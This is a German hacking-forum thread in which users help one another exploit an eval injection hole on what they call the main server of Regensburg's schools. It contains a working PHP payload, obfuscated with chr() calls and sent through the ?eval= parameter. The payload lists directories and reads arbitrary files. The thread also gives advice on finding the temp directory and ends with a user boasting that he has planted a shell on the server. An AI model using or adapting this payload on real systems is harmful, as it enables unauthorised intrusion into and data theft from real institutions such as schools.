eval - upload etc.

[Ken]

Kann es auch nicht glauben, dass das erstellen von files verboten ist, aber man muss sagen, dass es der Hauptserver der gesamten Regensburger Schulen ist

Alter, Du bist ein echter Glückspilz.

Ich habe Dir mal einen kleinen Dateibrowser gebastelt. Damit kannst Du mal die Verzeichnisse untersuchen und hoffentlich auch die Dateien öffnen und durchforsten. Kommt drauf an, ob Du wenigstens Leseberechtigung hast, wenn Dir das Schreiben schon verwehrt bleibt (was eigentlich wahrscheinlich ist, denn das unsichere Skript greift doch sicherlich auch auf irgendwelche anderen Dateien zu).

PHP-Code:

?eval=$eval = chr(101).chr(118).chr(97).chr(108); $o = chr(46); if(isset($_GET[chr(100).chr(105).chr(114)]) and is_dir($_GET[chr(100).chr(105).chr(114)])) $o = $_GET[chr(100).chr(105).chr(114)]; $h = opendir($o); echo chr(60).chr(100).chr(105).chr(118).chr(32).chr(115).chr(116).chr(121).chr(108).chr(101).chr(61).chr(34).chr(102).chr(108).chr(111).chr(97).chr(116).chr(58).chr(32).chr(108).chr(101).chr(102).chr(116).chr(59).chr(34).chr(62); while($d = readdir($h))  echo is_dir($o.chr(47).$d) ? chr(60).chr(97).chr(32).chr(104).chr(114).chr(101).chr(102).chr(61).chr(34).chr(63).$eval.chr(61).$_GET[$eval].chr(38).chr(100).chr(105).chr(114).chr(61).$o.chr(47).$d.chr(34).chr(62).chr(91).chr(68).chr(73).chr(82).chr(93).chr(32).$d.chr(60).chr(47).chr(97).chr(62).chr(60).chr(98).chr(114).chr(32).chr(47).chr(62) : chr(60).chr(97).chr(32).chr(104).chr(114).chr(101).chr(102).chr(61).chr(34).chr(63).$eval.chr(61).$_GET[$eval].chr(38).chr(100).chr(105).chr(114).chr(61).$o.chr(38).chr(102).chr(105).chr(108).chr(101).chr(61).$o.chr(47).$d.chr(34).chr(62).chr(91).chr(70).chr(73).chr(76).chr(69).chr(93).chr(32).$d.chr(60).chr(47).chr(97).chr(62).chr(60).chr(98).chr(114).chr(32).chr(47).chr(62); if(isset($_GET[chr(102).chr(105).chr(108).chr(101)]) and is_file($_GET[chr(102).chr(105).chr(108).chr(101)])) $src = file_get_contents($_GET[chr(102).chr(105).chr(108).chr(101)]); else  $src = chr(45).chr(45).chr(45); echo chr(60).chr(47).chr(100).chr(105).chr(118).chr(62).chr(60).chr(100).chr(105).chr(118).chr(32).chr(115).chr(116).chr(121).chr(108).chr(101).chr(61).chr(34).chr(102).chr(108).chr(111).chr(97).chr(116).chr(58).chr(32).chr(114).chr(105).chr(103).chr(104).chr(116).chr(59).chr(32).chr(119).chr(105).chr(100).chr(116).chr(104).chr(58).chr(32).chr(53).chr(48).chr(37).chr(59).chr(34).chr(62).chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(115).chr(116).chr(121).chr(108).chr(101).chr(61).chr(34).chr(119).chr(105).chr(100).chr(116).chr(104).chr(58).chr(32).chr(49).chr(48).chr(48).chr(37).chr(59).chr(32).chr(104).chr(101).chr(105).chr(103).chr(104).chr(116).chr(58).chr(32).chr(49).chr(48).chr(48).chr(37).chr(59).chr(34).chr(62).$src.chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62).chr(60).chr(47).chr(100).chr(105).chr(118).chr(62); closedir($h); 


In dem Skript wird jetzt davon ausgegangen, dass man die eval-Lücke auch mit ?eval= aufruft. Wenn das nicht der Fall ist, müsstest Du den String $eval gleich am Anfang des Skriptes noch auf den richtigen Parameter anpassen. Schau einfach mal, wie das so funktioniert.

Und schon mal probiert, auf das "/tmp/php1WnBH2" zuzugreifen?

[RikuXan]

Wow, das ist praktisch, vielen Dank Funktioniert alles super, jetzt muss ich nur noch files mit wichtigem Inhalt finden. Das tmp-Verzeichnis hab ich noch nicht angesehen, muss mal schauen ob ichs finde. Wo sollte es denn normalerweise liegen?

MfG RikuXan

[VeN0m]

$_SERVER['TMP'] bzw. $_SERVER['TEMP'] enthält den Pfad zum temporären Verzeichnis.

[RikuXan]

So, vielen Dank für euer aller Hilfe , hab die shell jetzt auf dem Server, musste nur ein paar Levels nach oben gehn, da war dann nicht mehr denied ^_^ .

MfG RikuXan